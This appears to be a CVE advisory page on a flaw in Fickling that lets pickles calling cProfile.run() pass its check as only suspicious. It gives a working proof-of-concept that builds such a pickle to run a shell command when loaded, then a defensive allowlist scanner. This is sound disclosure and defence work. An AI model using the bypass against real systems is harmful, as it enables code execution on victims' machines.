Security Vulnerability Report
CVE-2026-22607 CVSS 7.8 HIGH

CVE-2026-22607

Published: 2026-01-10 02:15:50
Last Modified: 2026-01-16 18:58:23

Description

Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:trailofbits:fickling:*:*:*:*:*:*:*:* - VULNERABLE
Fickling < 0.1.7
Fickling 0.1.0 - 0.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
"""
CVE-2026-22607 PoC - Malicious pickle using cProfile.run()

This PoC demonstrates how an attacker can bypass Fickling's security check
by using cProfile.run() instead of directly calling os.system().
"""
import pickle
import cProfile
import os


class MaliciousPayload:
    def __reduce__(self):
        # Using cProfile.run() to execute arbitrary code
        # This will be misclassified by Fickling as SUSPICIOUS instead of OVERTLY_MALICIOUS
        return (cProfile.run, ('os.system("echo PWNED > /tmp/pwned.txt")',))


# Generate malicious pickle
malicious_pickle = pickle.dumps(MaliciousPayload())

# Save to file (for testing)
with open('malicious_cprofile.pkl', 'wb') as f:
    f.write(malicious_pickle)

print('Malicious pickle created: malicious_cprofile.pkl')
print('Fickling will classify this as SUSPICIOUS, not OVERTLY_MALICIOUS')
print('When deserialized, it will execute: os.system("echo PWNED > /tmp/pwned.txt")')
```
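A defender's counterpart to the PoC above, added here as an example and not taken from the advisory or from Fickling: a static scan with the standard library's pickletools that lists every (module, name) pair a pickle resolves through GLOBAL or STACK_GLOBAL and checks it against an allowlist, so an unlisted module such as cProfile is rejected outright instead of being downgraded by a gap in a denylist. The allowlist contents, the sample pickles and the simplified string/memo tracking (sufficient for pickles emitted by CPython's own pickler) are assumptions for illustration; the sample's cProfile.run argument is the harmless statement 'pass'.

```python
import cProfile
import pickle
import pickletools
from collections import OrderedDict

# Constructed allowlist: the exact (module, name) pairs this deployment's data
# legitimately needs; anything unlisted (cProfile included) is rejected.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
GET_OPS, PUT_OPS = {"GET", "BINGET", "LONG_BINGET"}, {"PUT", "BINPUT", "LONG_BINPUT"}


def imported_globals(data: bytes) -> list[tuple[str, str]]:
    """List every (module, name) the pickle resolves, without executing it; the
    string/memo tracking suffices for CPython-produced pickles (assumption)."""
    found, strings, memo, top = [], [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "MEMOIZE" or op.name in PUT_OPS:   # memo slot <- top
            memo[len(memo) if arg is None else arg] = top
            continue
        top = None                               # every other op replaces the top
        if op.name == "GLOBAL":                  # protocols 0-3: "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name in STRING_OPS:
            top = arg
            strings.append(arg)
        elif op.name in GET_OPS and isinstance(memo.get(arg), str):
            top = memo[arg]                      # re-use of a memoized string
            strings.append(top)
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            name, module = strings.pop(), strings.pop()
            found.append((module, name))
    return found


def verdict(data: bytes) -> str:
    bad = [g for g in imported_globals(data) if g not in ALLOWED_GLOBALS]
    return "REJECT" if bad else "ALLOW"


class _CProfileCall:
    """Constructed sample with the advisory's shape; the statement is harmless."""
    def __reduce__(self):
        return (cProfile.run, ("pass",))


def sample_cprofile_pickle(protocol: int) -> bytes:
    return pickle.dumps(_CProfileCall(), protocol=protocol)


BENIGN_PICKLE = pickle.dumps(OrderedDict(a=1, b=[2, "three"]))
```

Run verdict() on the raw bytes before anything calls pickle.loads(); this complements, rather than replaces, upgrading to Fickling 0.1.7.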

References

Patch commit
https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43
Release notes (v0.1.7)
https://github.com/trailofbits/fickling/releases/tag/v0.1.7
Vendor advisory GHSA-p523-jq9w-64x9 (tagged Exploit, Vendor Advisory)
https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9

Additional Record Data

Vulnerability Status
Analyzed
Weaknesses
CWE-184 (Incomplete List of Disallowed Inputs), CWE-502 (Deserialization of Untrusted Data)
CVSS 3.1 Subscores (Primary)
Exploitability 1.8, Impact 5.9
CVSS 4.0 Score (Secondary)
8.9 HIGH
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 4.0 Exploit Maturity
PROOF_OF_CONCEPT